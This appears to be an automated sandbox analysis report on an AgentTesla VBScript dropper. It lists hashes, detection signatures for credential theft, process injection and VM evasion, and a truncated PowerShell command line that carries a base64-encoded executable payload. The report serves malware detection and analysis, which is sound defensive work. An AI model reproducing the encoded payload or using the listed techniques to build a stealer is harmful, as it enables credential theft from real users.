Edit tour
Windows
Analysis Report
GJ890-1286.vbs
Overview
General Information
| Sample Name: | GJ890-1286.vbs |
| Analysis ID: | 830445 |
| MD5: | b73f50ff5bacd275282b43778180fd8e |
| SHA1: | 98d820b8a51989b2bf9e9982de31eccf47a54fba |
| SHA256: | 2dbfb717c5e54b04e5e174bc6e62f90c1609adeb52085a9d42184aadac74bf0f |
| Tags: | vbs |
| Infos: |  |
 | |
Detection
AgentTesla
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
VBScript performs obfuscated calls to suspicious functions
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Wscript starts Powershell (via cmd or directly)
Very long command line found
Suspicious powershell command line found
Injects a PE file into a foreign processes
Yara detected Generic Downloader
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Classification
- System is w10x64
wscript.exe (PID: 4464 cmdline: C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\GJ890 -1286.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C) 
powershell.exe (PID: 6008 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" [Byte[]] $ rOWg = [sy stem.Conve rt]::FromB ase64strin g('TVqQAAM AAAAEAAAA/ /8AALgAAAA AAAAAQAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAgAAAAA4 fug4AtAnNI bgBTM0hVGh pcyBwcm9nc mFtIGNhbm5 vdCBiZSByd W4gaW4gRE9 TIG1vZGUuD Q0KJAAAAAA AAABQRQAAT AEDALAZ+mM AAAAAAAAAA OAAAiELAVA AACYAAAAGA AAAAAAAskQ AAAAgAAAAY AAAAAAAEAA gAAAAAgAAB AAAAAAAAAA GAAAAAAAAA ACgAAAAAgA AAAAAAAMAY IUAABAAABA AAAAAEAAAE AAAAAAAABA AAAAAAAAAA AAAAGBEAAB PAAAAAGAAA CgDAAAAAAA AAAAAAAAAA AAAAAAAAIA AAAwAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAIAAACAA AAAAAAAAAA AAACCAAAEg AAAAAAAAAA AAAAC50ZXh 0AAAAuCQAA AAgAAAAJgA AAAIAAAAAA AAAAAAAAAA AACAAAGAuc nNyYwAAACg DAAAAYAAAA AQAAAAoAAA AAAAAAAAAA AAAAABAAAB ALnJlbG9jA AAMAAAAAIA AAAACAAAAL AAAAAAAAAA AAAAAAAAAQ AAAQgAAAAA AAAAAAAAAA AAAAACURAA AAAAAAEgAA AACAAUAxCg AAOQaAAADA AAAAAAAAKh DAAC4AAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAB4CKAEAA AoqHgIoAwA ACiqmcwQAA AqAAQAABHM FAAAKgAIAA ARzBgAACoA DAAAEcwcAA AqABAAABCo ufgEAAARvC AAACioufgI AAARvCQAAC ioufgMAAAR vCgAACiouf gQAAARvCwA ACirWfgUAA AQUKBoAAAo sAisGfgUAA AQqcgEAAHD QBQAAAigPA AAKbxsAAAp zHAAACoAFA AAEK9oafgY AAAQqHgKAB gAABCpWcww AAAYoHQAAC nQGAAACgAc AAAQqHgIoH gAACioafgc AAAQqGigNA AAGKh4CKBI AAAoqABMwB ABAAAAAAQA AEXIhAABwC xYrARZFAgA AAAIAAAAYA AAAKx8XDAd +IAAACgIXK BsAAAYsBxc KFyvbKw0IF 9YMGCvSCBs x3xYKBiobM AoABQQAAAI AABFylQAAc AIoIQAACgw WKwEWRQMAA AACAAAADQA AABgAAAArI RID/hUPAAA CFyviEgT+F Q4AAAIYK9c SAxZ9GAAAB BkrzBID0A8 AAAIoDwAAC igiAAAKuH0 NAAAEAygjA AAKLQ0IcqE AAHADKCQAA AoMAgh+JQA ACn4lAAAKF hp+JQAAChQ SAxIEKBAAA AYtBnMmAAA KegQfPCgnA AAKEwUWKwE WRRQAAAAFA AAAFQAAACQ AAAAzAAAAd AAAAMAAAAD TAAAA8gAAA AIBAABQAQA AZQEAAG8BA ACIAQAAnAE AALABAADIA QAA3gEAAA0 CAAAsAgAAX QIAADhxAgA ABBEFHzTWK CcAAAoTBhc rliCzAAAAj QkAAAETBxg rhxEHFiACA AEAnhk4eP/ //ygoAAAKG jMWEQR7CgA ABBEHKBEAA AYtHHMmAAA KehEEewoAA AQRBygSAAA GLQZzJgAAC noRBx8plBM IGjg3////E QR7CQAABBE IHtYSCRoSA SgVAAAGLQZ zJgAACnoRB hEJMxYRBHs JAAAEEQkoF wAABiwGcyY AAAp6BBEFH 1DWKCcAAAo TChs46/7// wQRBR9U1ig nAAAKEwscO Nj+//8RBHs JAAAEEQYRC iAAMAAAH0A oGAAABhMNH Ti5/v//BS0 lEQ0tIRcTD B44qf7//xE EewkAAAQWE QogADAAAB9 AKBgAAAYTD RENLQZzJgA ACnoRBHsJA AAEEQ0EEQs SASgWAAAGL QZzJgAACno RBSD4AAAA1 hMOHwk4W/7 //wQRBRzWK CkAAAoX2hM RHwo4Rv7// xYTEh8LODz +//84nwAAA AQRDh8M1ig nAAAKExMfD Dgj/v//BBE OHxDWKCcAA AoTFB8NOA/ +//8EEQ4fF NYoJwAAChM VHw44+/3// xEULEsRFBf aF9aNGwAAA RMWHw844/3 //wQRFREWF hEWjmkoKgA ACh8QOM39/ /8RBHsJAAA EEQ0RE9YRF hEWjmkSASg WAAAGLQZzJ gAACnoRDh8 o1hMOHxE4n v3//xESF9Y TEhESERE+W P///xENKCs AAAoTDx8SO H/9//8RBHs JAAAEEQge1 hEPGhIBKBY AAAYtBnMmA AAKegQRBR8 o1ignAAAKE xAfEzhO/f/